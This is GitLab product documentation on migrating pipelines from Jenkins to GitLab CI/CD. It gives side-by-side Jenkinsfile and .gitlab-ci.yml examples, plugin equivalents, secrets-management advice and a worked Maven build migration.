visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Embeddable Build Status](https://plugins.jenkins.io/embeddable-build-status/) | [Pipeline status badges](../../user/project/badges.md#pipeline-status-badges) | | [JUnit](https://plugins.jenkins.io/junit/) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Mailer](https://plugins.jenkins.io/mailer/) | [Notification emails](../../user/profile/notifications.md) | | [Parameterized Trigger Plugin](https://plugins.jenkins.io/parameterized-trigger/) | [`trigger` keyword](../yaml/_index.md#trigger) and [downstream pipelines](../pipelines/downstream_pipelines.md) | | [Role-based Authorization Strategy](https://plugins.jenkins.io/role-strategy/) | GitLab [permissions and roles](../../user/permissions.md) | | [Timestamper](https://plugins.jenkins.io/timestamper/) | [Job](../jobs/_index.md) logs are time stamped by default | ### Security Scanning features You might have used plugins for things like code quality, security, or static application scanning in Jenkins. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these plugins in GitLab using templates, for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. Secrets management in Jenkins is usually handled with the `Secret` type field or the Credentials Plugin. Credentials stored in the Jenkins settings can be exposed to jobs as environment variables by using the Credentials Binding plugin. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Jenkins](https://www.jenkins.io/doc/developer/security/secrets/#storing-secrets). You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Jenkins, ask yourself the following questions in preparation: - What plugins are used by jobs in Jenkins today? - Do you know what these plugins do exactly? - Do any plugins wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Jenkins agents? - Are there any shared libraries in use? - How are you authenticating from Jenkins? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Jenkins to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate Jenkins configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. ### Additional Resources - You can use the [JenkinsFile Wrapper](https://gitlab.com/gitlab-org/jfr-container-builder/) to run a complete Jenkins instance inside of a GitLab CI/CD job, including plugins. Use this tool to help ease the transition to GitLab CI/CD, by delaying the migration of less urgent pipelines. {{< alert type="note" >}} The JenkinsFile Wrapper is not packaged with GitLab and falls outside of the scope of support. For more information, see the [Statement of Support](https://about.gitlab.com/support/statement-of-support/). {{< /alert >}} If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from Jenkins breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from Jenkins to GitLab CI/CD, you are able to create CI/CD pipelines that replicate and enhance your Jenkins workflows. ## Key similarities and differences GitLab CI/CD and Jenkins are CI/CD tools with some similarities. Both GitLab and Jenkins: - Use stages for collections of jobs. - Support container-based builds. Additionally, there are some important differences between the two: - GitLab CI/CD pipelines are all configured in a YAML format configuration file. Jenkins uses either a Groovy format configuration file (declarative pipelines) or Jenkins DSL (scripted pipelines). - GitLab offers [GitLab.com](../../subscriptions/gitlab_com/_index.md), a multi-tenant SaaS service, and [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. You can also run your own [GitLab Self-Managed](../../subscriptions/self_managed/_index.md) instance. Jenkins deployments must be self-hosted. - GitLab provides source code management (SCM) out of the box. Jenkins requires a separate SCM solution to store code. - GitLab provides a built-in container registry. Jenkins requires a separate solution for storing container images. - GitLab provides built-in templates for scanning code. Jenkins requires 3rd party plugins for scanning code. ## Comparison of features and concepts Many Jenkins features and concepts have equivalents in GitLab that offer the same functionality. ### Configuration file Jenkins can be configured with a [`Jenkinsfile` in the Groovy format](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/). GitLab CI/CD uses a `.gitlab-ci.yml` file by default. Example of a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('hello') { steps { echo "Hello World" } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - hello hello-job: stage: hello script: - echo "Hello World" ``` ### Jenkins pipeline syntax A Jenkins configuration is composed of a `pipeline` block with sections and directives. GitLab CI/CD has similar functionality, configured with YAML keywords. #### Sections | Jenkins | GitLab | Explanation | |----------|----------------|-------------| | `agent` | `image` | Jenkins pipelines execute on agents, and the `agent` section defines how the pipeline executes, and the Docker container to use. GitLab jobs execute on runners, and the `image` keyword defines the container to use. You can configure your own runners in Kubernetes or on any host. | | `post` | `after_script` or `stage` | The Jenkins `post` section defines actions that should be performed at the end of a stage or pipeline. In GitLab, use `after_script` for commands to run at the end of a job, and `before_script` for actions to run before the other commands in a job. Use `stage` to select the exact stage a job should run in. GitLab supports both `.pre` and `.post` stages that always run before or after all other defined stages. | | `stages` | `stages` | Jenkins stages are groups of jobs. GitLab CI/CD also uses stages, but it is more flexible. You can have multiple stages each with multiple independent jobs. Use `stages` at the top level to the stages and their execution order, and use `stage` at the job level to define the stage for that job. | | `steps` | `script` | Jenkins `steps` define what to execute. GitLab CI/CD uses a `script` section which is similar. The `script` section is a YAML array with separate entries for each command to run in sequence. | #### Directives | Jenkins | GitLab | Explanation | |---------------|----------------|-------------| | `environment` | `variables` | Jenkins uses `environment` for environment variables. GitLab CI/CD uses the `variables` keyword to define CI/CD variables that can be used during job execution, but also for more dynamic pipeline configuration. These can also be set in the GitLab UI, under CI/CD settings. | | `options` | Not applicable | Jenkins uses `options` for additional configuration, including timeouts and retry values. GitLab does not need a separate section for options, all configuration is added as CI/CD keywords at the job or pipeline level, for example `timeout` or `retry`. | | `parameters` | Not applicable | In Jenkins, parameters can be required when triggering a pipeline. Parameters are handled in GitLab with CI/CD variables, which can be defined in many places, including the pipeline configuration, project settings, at runtime manually through the UI, or API. | | `triggers` | `rules` | In Jenkins, `triggers` defines when a pipeline should run again, for example through cron notation. GitLab CI/CD can run pipelines automatically for many reasons, including Git changes and merge request updates. Use the `rules` keyword to control which events to run jobs for. Scheduled pipelines are defined in the project settings. | | `tools` | Not applicable | In Jenkins, `tools` defines additional tools to install in the environment. GitLab does not have a similar keyword, as the recommendation is to use container images prebuilt with the exact tools required for your jobs. These images can be cached and can be built to already contain the tools you need for your pipelines. If a job needs additional tools, they can be installed as part of a `before_script` section. | | `input` | Not applicable | In Jenkins, `input` adds a prompt for user input. Similar to `parameters`, inputs are handled in GitLab through CI/CD variables. | | `when` | `rules` | In Jenkins, `when` defines when a stage should be executed. GitLab also has a `when` keyword, which defines whether a job should start running based on the status of earlier jobs, for example if jobs passed or failed. To control when to add jobs to specific pipelines, use `rules`. | ### Common configurations This section goes over commonly used CI/CD configurations, showing how they can be converted from Jenkins to GitLab CI/CD. [Jenkins pipelines](https://www.jenkins.io/doc/book/pipeline/) generate automated CI/CD jobs that are triggered when certain event take place, such as a new commit being pushed. A Jenkins pipeline is defined in a `Jenkinsfile`. The GitLab equivalent is the [`.gitlab-ci.yml` configuration file](../yaml/_index.md). Jenkins does not provide a place to store source code, so the `Jenkinsfile` must be stored in a separate source control repository. #### Jobs Jobs are a set of commands that run in a set sequence to achieve a particular result. For example, build a container then deploy it to production, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('build') { agent { docker 'golang:alpine' } steps { apk update go build -o bin/hello } post { always { archiveArtifacts artifacts: 'bin/hello' onlyIfSuccessful: true } } } stage('deploy') { agent { docker 'golang:alpine' } when { branch 'staging' } steps { echo "Deploying to staging" scp bin/hello remoteuser@remotehost:/remote/directory } } } } ``` This example: - Uses the `golang:alpine` container image. - Runs a job for building code. - Stores the built executable as an artifact. - Adds a second job to deploy to `staging`, which: - Only exists if the commit targets the `staging` branch. - Starts after the build stage succeeds. - Uses the built executable artifact from the earlier job. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' artifacts: paths: - bin/hello ``` ##### Parallel In Jenkins, jobs that are not dependent on previous jobs can run in parallel when added to a `parallel` section. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Parallel') { parallel { stage('Python') { agent { docker 'python:latest' } steps { sh "python --version" } } stage('Java') { agent { docker 'openjdk:latest' } when { branch 'staging' } steps { sh "java -version" } } } } } } ``` This example runs a Python and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In GitLab you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. Jenkins runs the matrix sequentially. For example, in a `Jenkinsfile`: ```groovy matrix { axes { axis { name 'PLATFORM' values 'linux', 'mac', 'windows' } axis { name 'ARCH' values 'x64', 'x86' } } stages { stage('build') { echo "Building $PLATFORM for $ARCH" } stage('test') { echo "Building $PLATFORM for $ARCH" } stage('deploy') { echo "Building $PLATFORM for $ARCH" } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - build - test - deploy .parallel-hidden-job: parallel: matrix: - PLATFORM: [linux, mac, windows] ARCH: [x64, x86] build-job: extends: .parallel-hidden-job stage: build script: - echo "Building $PLATFORM for $ARCH" test-job: extends: .parallel-hidden-job stage: test script: - echo "Testing $PLATFORM for $ARCH" deploy-job: extends: .parallel-hidden-job stage: deploy script: - echo "Testing $PLATFORM for $ARCH" ``` #### Container Images In GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) using the [image](../yaml/_index.md#image) keyword. For example, in a `Jenkinsfile`: ```groovy stage('Version') { agent { docker 'python:latest' } steps { echo 'Hello Python' sh 'python --version' } } ``` This example shows commands running in a `python:latest` container. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml version-job: image: python:latest script: - echo "Hello Python" - python --version ``` #### Variables In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any environment { NAME = 'Fern' } stages { stage('English') { environment { GREETING = 'Hello' } steps { sh 'echo "$GREETING $NAME"' } } stage('Spanish') { environment { GREETING = 'Hola' } steps { sh 'echo "$GREETING $NAME"' } } } } ``` This example shows how variables can be used to pass values to commands in jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` Variables can also be [set in the GitLab UI, in the CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). In some cases, you can use [protected](../variables/_index.md#protect-a-cicd-variable) and [masked](../variables/_index.md#mask-a-cicd-variable) variables for secret values. These variables can be accessed in pipeline jobs the same as variables defined in the configuration file. For example, in a `Jenkinsfile`: ```groovy pipeline { agent any stages { stage('Example Username/Password') { environment { AWS_ACCESS_KEY = credentials('aws-access-key') } steps { sh 'my-login-script.sh $AWS_ACCESS_KEY' } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login-job: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, GitLab CI/CD makes [predefined variables](../variables/predefined_variables.md) available to every pipeline and job which contain values relevant to the pipeline and repository. #### Expressions and conditionals When a new pipeline starts, GitLab checks which jobs should run in that pipeline. You can configure jobs to run depending on factors like the status of variables, or the pipeline type. For example, in a `Jenkinsfile`: ```groovy stage('deploy_staging') { agent { docker 'alpine:latest' } when { branch 'staging' } steps { echo "Deploying to staging" } } ``` In this example, the job only runs when the branch we are committing to is named `staging`. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml deploy_staging: stage: deploy script: - echo "Deploy to staging server" rules: - if: '$CI_COMMIT_BRANCH == staging' ``` #### Runners Like Jenkins agents, GitLab runners are the hosts that run jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own runners. To convert a Jenkins agent for use with GitLab CI/CD, uninstall the agent and then [install and register a runner](../runners/_index.md). Runners do not require much overhead, so you might be able to use similar provisioning as the Jenkins agents you were using. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed. For example, in a `Jenkinsfile`: ```groovy pipeline { agent none stages { stage('Linux') { agent { label 'linux' } steps { echo "Hello, $USER" } } stage('Windows') { agent { label 'windows' } steps { echo "Hello, %USERNAME%" } } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml linux_job: stage: build tags: - linux script: - echo "Hello, $USER" windows_job: stage: build tags: - windows script: - echo "Hello, %USERNAME%" ``` #### Artifacts In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for example for testing or deployment. For example, in a `Jenkinsfile`: ```groovy stages { stage('Generate Cat') { steps { sh 'touch cat.txt' sh 'echo "meow" > cat.txt' } post { always { archiveArtifacts artifacts: 'cat.txt' onlyIfSuccessful: true } } } stage('Use Cat') { steps { sh 'cat cat.txt' } } } ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt artifacts: paths: - cat.txt ``` #### Caching A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). Jenkins core does not provide caching. For example, in a `.gitlab-ci.yml` file: ```yaml cache-job: script: - echo "This job uses a cache." cache: key: binaries-cache-$CI_COMMIT_REF_SLUG paths: - binaries/ ``` ### Jenkins plugins Some functionality in Jenkins that is enabled through plugins is supported natively in GitLab with keywords and features that offer similar functionality. For example: | Jenkins plugin | GitLab feature | |-----------------------------------------------------------------------------------|----------------| | [Build Timeout](https://plugins.jenkins.io/build-timeout/) | [`timeout` keyword](../yaml/_index.md#timeout) | | [Cobertura](https://plugins.jenkins.io/cobertura/) | [Coverage report artifacts](../yaml/artifacts_reports.md#artifactsreportscoverage_report) and [Code coverage](../testing/code_coverage/_index.md) | | [Code coverage API](https://plugins.jenkins.io/code-coverage-api/) | [Code coverage](../testing/code_coverage/_index.md) and [Coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Embeddable Build Status](https://plugins.jenkins.io/embeddable-build-status/) | [Pipeline status badges](../../user/project/badges.md#pipeline-status-badges) | | [JUnit](https://plugins.jenkins.io/junit/) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Mailer](https://plugins.jenkins.io/mailer/) | [Notification emails](../../user/profile/notifications.md) | | [Parameterized Trigger Plugin](https://plugins.jenkins.io/parameterized-trigger/) | [`trigger` keyword](../yaml/_index.md#trigger) and [downstream pipelines](../pipelines/downstream_pipelines.md) | | [Role-based Authorization Strategy](https://plugins.jenkins.io/role-strategy/) | GitLab [permissions and roles](../../user/permissions.md) | | [Timestamper](https://plugins.jenkins.io/timestamper/) | [Job](../jobs/_index.md) logs are time stamped by default | ### Security Scanning features You might have used plugins for things like code quality, security, or static application scanning in Jenkins. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these plugins in GitLab using templates, for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. Secrets management in Jenkins is usually handled with the `Secret` type field or the Credentials Plugin. Credentials stored in the Jenkins settings can be exposed to jobs as environment variables by using the Credentials Binding plugin. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Jenkins](https://www.jenkins.io/doc/developer/security/secrets/#storing-secrets). You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Jenkins, ask yourself the following questions in preparation: - What plugins are used by jobs in Jenkins today? - Do you know what these plugins do exactly? - Do any plugins wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Jenkins agents? - Are there any shared libraries in use? - How are you authenticating from Jenkins? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Jenkins to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate Jenkins configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. ### Additional Resources - You can use the [JenkinsFile Wrapper](https://gitlab.com/gitlab-org/jfr-container-builder/) to run a complete Jenkins instance inside of a GitLab CI/CD job, including plugins. Use this tool to help ease the transition to GitLab CI/CD, by delaying the migration of less urgent pipelines. {{< alert type="note" >}} The JenkinsFile Wrapper is not packaged with GitLab and falls outside of the scope of support. For more information, see the [Statement of Support](https://about.gitlab.com/support/statement-of-support/). {{< /alert >}} If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
https://docs.gitlab.com/ci/migration/jenkins-maven
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/migration/jenkins-maven.md
2025-08-13
doc/ci/migration/examples
[ "doc", "ci", "migration", "examples" ]
jenkins-maven.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrate a Maven build from Jenkins to GitLab CI/CD
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you have a Maven build in Jenkins, you can use a [Java Spring](https://gitlab.com/gitlab-org/project-templates/spring) project template to migrate to GitLab. The template uses Maven for its underlying dependency management. ## Sample Jenkins configurations The following three Jenkins examples each use different methods to test, build, and install a Maven project into a shell agent: - Freestyle with shell execution - Freestyle with the Maven task plugin - A declarative pipeline using a Jenkinsfile All three examples run the same three commands in order, in three different stages: - `mvn test`: Run any tests found in the codebase - `mvn package -DskipTests`: Compile the code into an executable type defined in the POM and skip running any tests because that was done in the first stage. - `mvn install -DskipTests`: Install the compiled executable into the agent's local Maven `.m2` repository and again skip running the tests. These examples use a single, persistent Jenkins agent, which requires Maven to be pre-installed on the agent. This method of execution is similar to a GitLab Runner using the [shell executor](https://docs.gitlab.com/runner/executors/shell.html). ### Freestyle with shell execution If using Jenkins' built-in shell execution option to directly call `mvn` commands from the shell on the agent, the configuration might look like: ![Jenkins UI that shows build steps with Maven commands defined as shell commands.](img/maven-freestyle-shell_v16_4.png) ### Freestyle with Maven task plugin If using the Maven plugin in Jenkins to declare and execute any specific goals in the [Maven build lifecycle](https://maven.apache.org/guides/introduction/introduction-to-the-lifecycle.html), the configuration might look like: ![Jenkins UI that shows build steps with Maven commands defined using the Maven plugin.](img/maven-freestyle-plugin_v16_4.png) This plugin requires Maven to be installed on the Jenkins agent, and uses a script wrapper for calling Maven commands. ### Using a declarative pipeline If using a declarative pipeline, the configuration might look like: ```groovy pipeline { agent any tools { maven 'maven-3.6.3' jdk 'jdk11' } stages { stage('Build') { steps { sh "mvn package -DskipTests" } } stage('Test') { steps { sh "mvn test" } } stage('Install') { steps { sh "mvn install -DskipTests" } } } } ``` This example uses shell execution commands instead of plugins. By default, a declarative pipeline configuration is stored either in the Jenkins pipeline configuration or directly in the Git repository in a `Jenksinfile`. ## Convert Jenkins configuration to GitLab CI/CD While the previous examples are all slightly different, they can all be migrated to GitLab CI/CD with the same pipeline configuration. Prerequisites: - A GitLab Runner with a Shell executor - Maven 3.6.3 and Java 11 JDK installed on the shell runner This example mimics the behavior and syntax of building, testing, and installing on Jenkins. In a GitLab CI/CD pipeline, the commands run in "jobs", which are grouped into stages. The migrated configuration in the `.gitlab-ci.yml` configuration file consists of two global keywords (`stages` and `variables`) followed by 3 jobs: ```yaml stages: - build - test - install variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each. ### Run jobs in Docker containers Instead of using a persistent machine for handling this build process like the Jenkins samples, this example uses an ephemeral Docker container to handle execution. Using a container removes the need for maintaining a virtual machine and the Maven version installed on it. It also increases flexibility for expanding and extending the functionality of the pipeline. Prerequisites: - A GitLab Runner with the Docker executor that can be used by the project. If you are using GitLab.com, you can use the public instance runners. This migrated pipeline configuration consists of three global keywords (`stages`, `default`, and `variables`) followed by 3 jobs. This configuration makes use of additional GitLab CI/CD features for an improved pipeline compared to the [previous example](#convert-jenkins-configuration-to-gitlab-cicd): ```yaml stages: - build - test - install default: image: maven:3.6.3-openjdk-11 cache: key: $CI_COMMIT_REF_SLUG paths: - .m2/ variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `default` defines standard configuration to reuse in all jobs by default: - `image` defines the Docker image container to use and execute commands in. In this example, it's an official Maven Docker image with everything needed already installed. - `cache` is used to cache and reuse dependencies: - `key` is the unique identifier for the specific cache archive. In this example, it's a shortened version of the Git commit ref, autogenerated as a [predefined CI/CD variable](../../variables/predefined_variables.md). Any job that runs for the same commit ref reuses the same cache. - `paths` are the directories or files to include in the cache. In this example, we cache the `.m2/` directory to avoid re-installing dependencies between job runs. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each.
